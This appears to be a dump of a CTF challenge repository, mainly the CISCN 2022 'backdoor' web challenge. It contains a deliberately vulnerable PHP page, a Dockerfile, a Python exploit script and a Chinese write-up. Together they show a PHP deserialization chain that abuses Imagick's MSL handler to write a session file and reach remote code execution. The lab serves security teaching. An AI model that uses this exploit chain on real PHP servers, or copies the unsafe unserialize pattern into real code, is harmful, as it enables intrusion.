├── .gitmodules ├── CISCN └── 2022 │ └── backdoor │ ├── Dockerfile │ ├── docker-compose.yml │ ├── exp │ └── exp.py │ ├── flag │ ├── html │ └── index.php │ ├── readflag │ ├── go.mod │ ├── main.go │ └── readflag │ └── writup │ ├── img │ ├── flag.png │ ├── phpinfo.png │ └── src.png │ └── writup.md ├── README.md └── SCTF └── 2021 └── README.md /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "GeekGame"] 2 | path = GeekGame 3 | url = https://github.com/AFKL-CUIT/GeekGame-AFKL 4 | -------------------------------------------------------------------------------- /CISCN/2022/backdoor/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.4-apache 2 | 3 | COPY html /var/www/html 4 | 5 | COPY flag /flag 6 | COPY readflag/readflag /readflag 7 | 8 | RUN sed -i 's#http://deb.debian.org#http://mirrors.aliyun.com#g' /etc/apt/sources.list &&\ 9 | apt-get update && apt-get install -y libmagickwand-dev --no-install-recommends 10 | 11 | RUN pecl install imagick && docker-php-ext-enable imagick &&\ 12 | chmod -R 555 /var/www/html &&\ 13 | chmod 400 /flag &&\ 14 | chmod 111 /readflag && chmod u+s /readflag 15 | 16 | EXPOSE 80 17 | -------------------------------------------------------------------------------- /CISCN/2022/backdoor/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | imagsess: 4 | build: 5 | context: ./ 6 | dockerfile: Dockerfile 7 | restart: always 8 | ports: 9 | - "18080:80" 10 | -------------------------------------------------------------------------------- /CISCN/2022/backdoor/exp/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | #coding:utf-8 3 | 4 | import re 5 | import sys 6 | import time 7 | import requests 8 | 9 | timeout = 30 10 | 11 | host = sys.argv[1] 12 | port = sys.argv[2] 13 | 14 | url = f"http://{host}:{port}" 15 | write_session_payload = "O%3A8%3A%22backdoor%22%3A3%3A%7Bs%3A14%3A%22%00backdoor%00argv%22%3Bs%3A17%3A%22vid%3Amsl%3A%2Ftmp%2Fphp%2A%22%3Bs%3A15%3A%22%00backdoor%00class%22%3Bs%3A7%3A%22imagick%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A0%3B%7D" 16 | session_sleep_chain_payload = "O%3A8%3A%22backdoor%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22session_start%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A1%3B%7D" 17 | 18 | def rm_tmp_file(): 19 | headers = {"Accept": "*/*"} 20 | requests.get( 21 | f"{url}/?cmd=rm", 22 | headers=headers 23 | ) 24 | 25 | def upload_session(): 26 | headers = { 27 | "Accept": "*/*", 28 | "Content-Type": "multipart/form-data; boundary=------------------------c32aaddf3d8fd979" 29 | } 30 | data = "--------------------------c32aaddf3d8fd979\r\nContent-Disposition: form-data; name=\"swarm\"; filename=\"swarm.msl\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n\r\n \r\n \r\n\r\n--------------------------c32aaddf3d8fd979--" 31 | try: 32 | requests.post( 33 | f"{url}/?data=O%3A8%3A%22backdoor%22%3A3%3A%7Bs%3A14%3A%22%00backdoor%00argv%22%3Bs%3A17%3A%22vid%3Amsl%3A%2Ftmp%2Fphp%2A%22%3Bs%3A15%3A%22%00backdoor%00class%22%3Bs%3A7%3A%22imagick%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A0%3B%7D&cmd=unserialze", 34 | headers=headers, data=data 35 | ) 36 | except requests.exceptions.ConnectionError: 37 | pass 38 | 39 | def get_flag(): 40 | cookies = {"PHPSESSID": "afkl"} 41 | headers = {"Accept": "*/*"} 42 | response = requests.get( 43 | f"{url}/?data=O%3A8%3A%22backdoor%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22session_start%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A1%3B%7D&cmd=unserialze&1=system('/readflag');", 44 | headers=headers, cookies=cookies 45 | ) 46 | return re.findall(r"(flag\{.*\})", response.text) 47 | 48 | # 主逻辑 49 | if __name__ == '__main__': 50 | rm_tmp_file() 51 | upload_session() 52 | 53 | time.sleep(1) 54 | 55 | print(get_flag()[0]) 56 | -------------------------------------------------------------------------------- /CISCN/2022/backdoor/flag: -------------------------------------------------------------------------------- 1 | flag{imaG1ck_And_sEssi0n_is_c0ol} -------------------------------------------------------------------------------- /CISCN/2022/backdoor/html/index.php: -------------------------------------------------------------------------------- 1 | path)) { 11 | return include $this->path; 12 | } else { 13 | throw new Exception("__sleep failed..."); 14 | } 15 | } 16 | 17 | public function __wakeup() { 18 | if ( 19 | $this->do_exec_func && 20 | in_array($this->class, get_defined_functions()["internal"]) 21 | ) { 22 | call_user_func($this->class); 23 | } else { 24 | $argv = $this->argv; 25 | $class = $this->class; 26 | 27 | new $class($argv); 28 | } 29 | } 30 | } 31 | 32 | 33 | $cmd = $_REQUEST['cmd']; 34 | $data = $_REQUEST['data']; 35 | 36 | switch ($cmd) { 37 | case 'unserialze': 38 | unserialize($data); 39 | break; 40 | 41 | case 'rm': 42 | system("rm -rf /tmp"); 43 | break; 44 | 45 | default: 46 | highlight_file(__FILE__); 47 | break; 48 | } -------------------------------------------------------------------------------- /CISCN/2022/backdoor/readflag/go.mod: -------------------------------------------------------------------------------- 1 | module readflag 2 | 3 | go 1.17 4 | -------------------------------------------------------------------------------- /CISCN/2022/backdoor/readflag/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "io/ioutil" 6 | ) 7 | 8 | func main() { 9 | flagData, _ := ioutil.ReadFile("/flag") 10 | fmt.Println(string(flagData)) 11 | } 12 | -------------------------------------------------------------------------------- /CISCN/2022/backdoor/readflag/readflag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AFKL1919/CTF-Challenges/a2199e002ce59711dcdb0e916d8c3c0c29821dbf/CISCN/2022/backdoor/readflag/readflag -------------------------------------------------------------------------------- /CISCN/2022/backdoor/writup/img/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AFKL1919/CTF-Challenges/a2199e002ce59711dcdb0e916d8c3c0c29821dbf/CISCN/2022/backdoor/writup/img/flag.png -------------------------------------------------------------------------------- /CISCN/2022/backdoor/writup/img/phpinfo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AFKL1919/CTF-Challenges/a2199e002ce59711dcdb0e916d8c3c0c29821dbf/CISCN/2022/backdoor/writup/img/phpinfo.png -------------------------------------------------------------------------------- /CISCN/2022/backdoor/writup/img/src.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AFKL1919/CTF-Challenges/a2199e002ce59711dcdb0e916d8c3c0c29821dbf/CISCN/2022/backdoor/writup/img/src.png -------------------------------------------------------------------------------- /CISCN/2022/backdoor/writup/writup.md: -------------------------------------------------------------------------------- 1 | ## 题目writeup: 2 | 3 | 题目灵感来自于`swarm`团队在7月14日发布的[文章](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/),该文章展示了针对如下结构的php代码的一种全新攻击方法。 4 | ```php 5 | new $_GET[1]($_GET[2]); 6 | ``` 7 | 8 | 网站首页展示的就是源码。 9 | ![1](img/src.png) 10 | 11 | 存在反序列化漏洞,以及一个`backdoor`类。类中有两个特殊结构: 12 | 1. 在`__wakeup`可以执行一次任意无参函数的结构。 13 | 2. 在`__sleep`可以将任意文件包含。 14 | 15 | `include`临时文件或者`session`即可`rce`,考虑如何触发`__sleep`。通过php内核源码可知,当前环境下唯一存在序列化的地方就是`session`,所以要想办法控制`session`数据。 16 | 17 | 接下来尝试触发`phpinfo`,收集信息。可以发现网站存在`imagick`扩展。 18 | ![1](img/phpinfo.png) 19 | 20 | 那么接下来就是利用imagick扩展的特性进行攻击。 21 | 22 | 根据这篇[文章](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)发现,`imagick`类在初始化时可以执行`Magick Scripting Language`。那么考虑用其特性,在临时文件中写入`Magick Scripting Language`,然后在`imagick`类初始化的时候执行临时文件写入`session`文件。再触发`__sleep`包含`session`文件以`RCE`。 23 | 24 | 写入文件时须注意以下几点: 25 | 1. 因为`imagick`对文件格式解析较严,需要写入的文件必须是其支持的图片格式,如jpg、gif、ico等。如果直接插入`session`数据,会导致解析图片错误,导致文件无法写入。 26 | 2. `php`对`session`的格式解析也较为严格。数据尾不可以存在脏数据,否则`session`解析错误会无法触发`__sleep`。 27 | 28 | 所以我们需要找到一个容许在末尾添加脏数据,且脏数据不会被`imagick`抹去的图片格式。`imagick`共支持几十种图片格式, 29 | 30 | 找到一个这样的图片格式并不难。最后发现可以使用`ppm`格式,其不像其他图片格式存在`crc`校验或者在文件末尾存在`magic`头。结构十分简单,可以进行利用。 31 | 32 | 首先利用网站提供的功能,删除`/tmp`下的文件。 33 | ```http 34 | GET /?cmd=rm HTTP/1.1 35 | Host: 127.0.0.1:18080 36 | Accept: */* 37 | 38 | 39 | ``` 40 | 41 | 然后如下发包。这样`imagick`就会开始执行`Magick Scripting Language`,写入文件`/tmp/sess_afkl`。 42 | ```http 43 | POST /?data=O%3A8%3A%22backdoor%22%3A3%3A%7Bs%3A14%3A%22%00backdoor%00argv%22%3Bs%3A17%3A%22vid%3Amsl%3A%2Ftmp%2Fphp%2A%22%3Bs%3A15%3A%22%00backdoor%00class%22%3Bs%3A7%3A%22imagick%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A0%3B%7D&cmd=unserialze HTTP/1.1 44 | Host: 127.0.0.1:18080 45 | Accept: */* 46 | Content-Length: 703 47 | Content-Type: multipart/form-data; boundary=------------------------c32aaddf3d8fd979 48 | 49 | --------------------------c32aaddf3d8fd979 50 | Content-Disposition: form-data; name="swarm"; filename="swarm.msl" 51 | Content-Type: application/octet-stream 52 | 53 | 54 | 55 | 56 | 57 | 58 | --------------------------c32aaddf3d8fd979-- 59 | ``` 60 | 61 | 随后使用执行一次任意无参函数的功能,触发`session_start`函数,并设置`cookie`为`PHPSESSID=afkl`,即可文件包含`session`,成功`RCE`。`flag`执行根目录的`readflag`即可。 62 | ```http 63 | GET /?data=O%3A8%3A%22backdoor%22%3A2%3A%7Bs%3A5%3A%22class%22%3Bs%3A13%3A%22session_start%22%3Bs%3A12%3A%22do_exec_func%22%3Bb%3A1%3B%7D&cmd=unserialze&1=system('/readflag'); HTTP/1.1 64 | Host: 127.0.0.1:18080 65 | Accept: */* 66 | Cookie: PHPSESSID=afkl 67 | 68 | 69 | ``` 70 | 71 | ![2](img/flag.png) -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | A collection of all the CTF challenges I have made. 2 | 3 | ``` 4 | . 5 | ├── CISCN # 全国大学生信息安全竞赛 6 | │   └── 2022 7 | │   └── backdoor 8 | ├── GeekGame # 极客大挑战 9 | │   ├── 2020 10 | │   │   ├── X迪的pyp语言 11 | │   │   ├── pop chain epic 12 | │   │   ├── wp 13 | │   │   └── 知X堂的php教程 14 | │   └── 2021 15 | │   ├── babyPOP 16 | │   ├── babyPy 17 | │   ├── easyGO 18 | │   ├── easyPOP 19 | │   ├── easyPy 20 | │   ├── where_is_my_FUMO 21 | │   └── wp 22 | └── SCTF 23 | └── 2021 24 | ``` -------------------------------------------------------------------------------- /SCTF/2021/README.md: -------------------------------------------------------------------------------- 1 | # Where is the Challenges? 2 | 3 | Please see the [web partition in the SCTF2021](https://github.com/SycloverTeam/SCTF2021/tree/master/web) project. 4 | Url: https://github.com/SycloverTeam/SCTF2021/tree/master/web 5 | 6 | # Which Challenges did you produce? 7 | 8 | - FUMO_on_the_Christmas_tree 9 | - GOFTP 10 | - Upload_it_1 11 | - Upload_it_2 12 | - ezosu --------------------------------------------------------------------------------